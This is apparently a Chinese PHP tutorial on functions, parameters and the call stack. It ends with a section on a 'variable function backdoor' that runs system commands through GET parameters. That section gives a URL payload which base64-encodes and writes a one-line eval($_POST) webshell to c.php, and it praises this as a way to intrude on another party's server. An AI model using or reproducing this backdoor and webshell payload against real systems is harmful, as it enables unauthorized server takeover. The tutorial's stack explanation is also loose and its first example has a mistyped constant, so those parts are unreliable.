函数是什么?
函数(function)是一段完成指定任务的已命名代码块。函数可以遵照给它的一组值或参数完成特定的任务,并且可能返回一个值。在PHP中有两种函数:自定义函数与系统函数。
函数就是可以完成固定功能的语句或语句集合,可以单复调用。
php函数是一段有指定作用的代码集合,可以反复调用来完成程序员想要实现的目的。
下面是一段定义一个输出This is function的简单函数并调用的代码:
<?php
function test (){
echo "This is function"._FUNCTION_;
}
test();
?>
函数调用过程
add($x,$y)中的$x,$y是形参,echo add(10,3)中的10,3是实参,
堆栈:系统开辟的一个临时空间。
调用过程中系统会把函数放到堆栈中,在堆栈中只有实参传给形参并执行,然后寄存器将值返回给内存,函数才能成功调用。
如果函数值没有返回,它会变成存储在堆栈中的**“垃圾”**,不能被调用,而堆栈在函数调用结束后被销毁,函数值也就跟着消失了。
下面定义了一个简单的让两个数相加的函数,调用后输出结果:
<?php
function add($x,$y){
$sum = $x + $y;
return $sum;
}
echo add(10,3);
?>
图解:
可变函数后门(非常简单)
这是一个非常简单的php可变函数,用get方法传参就能构成后门
<?php
$_GET['a']($_GET['b']);
?>
如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。
?a=system&b=ipconfig
如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};